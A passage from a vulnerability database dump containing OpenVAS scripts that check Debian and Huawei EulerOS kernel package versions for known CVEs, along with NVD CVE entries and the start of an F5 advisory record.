isdpkgvuln(pkg:\"linux-headers-4.9.0-3-marvell\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-octeon\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-powerpc64le\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-686-pae\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-amd64\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-s390x\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x-dbg\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-kbuild-4.9\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-4.9\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-perf-4.9\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-4.9\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-4.9.0-3\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"usbip\", ver:\"4.9.30-2+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:36:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8839", "CVE-2017-1000364", "CVE-2017-10911"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171154", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1154)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1154\");\n script_version(\"2020-01-23T10:54:09+0000\");\n script_cve_id(\"CVE-2015-8839\", \"CVE-2017-1000364\", \"CVE-2017-10911\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:54:09 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:54:09 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1154)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1154\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1154\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1154 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed), this affects Linux Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010).(CVE-2017-1000364)\n\nThe make_response function in drivers/block/xen-blkback/blkback.c in the Linux kernel before 4.11.8 allows guest OS users to obtain sensitive information from host OS (or other guest OS) kernel memory by leveraging the copying of uninitialized padding fields in Xen block-interface response structures, aka XSA-216.(CVE-2017-10911)\n\nMultiple race conditions in the ext4 filesystem implementation in the Linux kernel before 4.5 allow local users to cause a denial of service (disk corruption) by writing to a page that is associated with a different user's file after unsynchronized hole punching and page-fault handling.(CVE-2015-8839)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.49.1.138\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:41:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8839", "CVE-2017-1000364", "CVE-2017-10911"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171155", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171155", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1155)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1155\");\n script_version(\"2020-01-23T10:54:11+0000\");\n script_cve_id(\"CVE-2015-8839\", \"CVE-2017-1000364\", \"CVE-2017-10911\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:54:11 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:54:11 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1155)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1155\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1155\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1155 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed), this affects Linux Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010).(CVE-2017-1000364)\n\nThe make_response function in drivers/block/xen-blkback/blkback.c in the Linux kernel before 4.11.8 allows guest OS users to obtain sensitive information from host OS (or other guest OS) kernel memory by leveraging the copying of uninitialized padding fields in Xen block-interface response structures, aka XSA-216.(CVE-2017-10911)\n\nMultiple race conditions in the ext4 filesystem implementation in the Linux kernel before 4.5 allow local users to cause a denial of service (disk corruption) by writing to a page that is associated with a different user's file after unsynchronized hole punching and page-fault handling.(CVE-2015-8839)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.55.58.94.h9\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:36:31", "description": "The KVM subsystem in the Linux kernel through 4.13.3 allows guest OS users to cause a denial of service (assertion failure, and hypervisor hang or crash) via an out-of bounds guest_irq value, related to arch/x86/kvm/vmx.c and virt/kvm/eventfd.c.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-26T05:29:00", "title": "CVE-2017-1000252", "type": "cve", "cwe": ["CWE-617", "CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000252"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.3"], "id": "CVE-2017-1000252", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000252", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.3:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:36", "description": "The XFS_IS_REALTIME_INODE macro in fs/xfs/xfs_linux.h in the Linux kernel before 4.13.2 does not verify that a filesystem has a realtime device, which allows local users to cause a denial of service (NULL pointer dereference and OOPS) via vectors related to setting an RHINHERIT flag on a directory.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-15T11:29:00", "title": "CVE-2017-14340", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14340"], "modified": "2017-12-07T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.1"], "id": "CVE-2017-14340", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14340", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:32", "description": "The sanity_check_ckpt function in fs/f2fs/super.c in the Linux kernel before 4.12.4 does not validate the blkoff and segno arrays, which allows local users to gain privileges via unspecified vectors.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-19T18:29:00", "title": "CVE-2017-10663", "type": "cve", "cwe": ["CWE-129"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10663"], "modified": "2017-08-23T17:53:00", "cpe": ["cpe:/o:linux:linux_kernel:4.12.3"], "id": "CVE-2017-10663", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10663", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:32", "description": "The mq_notify function in the Linux kernel through 4.11.9 does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T23:29:00", "title": "CVE-2017-11176", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11176"], "modified": "2018-12-13T11:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.11.9", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-11176", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11176", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.11.9:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:32", "description": "The make_response function in drivers/block/xen-blkback/blkback.c in the Linux kernel before 4.11.8 allows guest OS users to obtain sensitive information from host OS (or other guest OS) kernel memory by leveraging the copying of uninitialized padding fields in Xen block-interface response structures, aka XSA-216.", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2017-07-05T01:29:00", "title": "CVE-2017-10911", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10911"], "modified": "2018-09-07T10:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.11.7"], "id": "CVE-2017-10911", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10911", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.11.7:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-05-20T00:31:30", "bulletinFamily": "software", "cvelist": ["CVE-2017-11176"], "description": "\nF5 Product Development has assigned ID CPF-24558, CPF-24559, and CPF-24560 (Traffix) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or 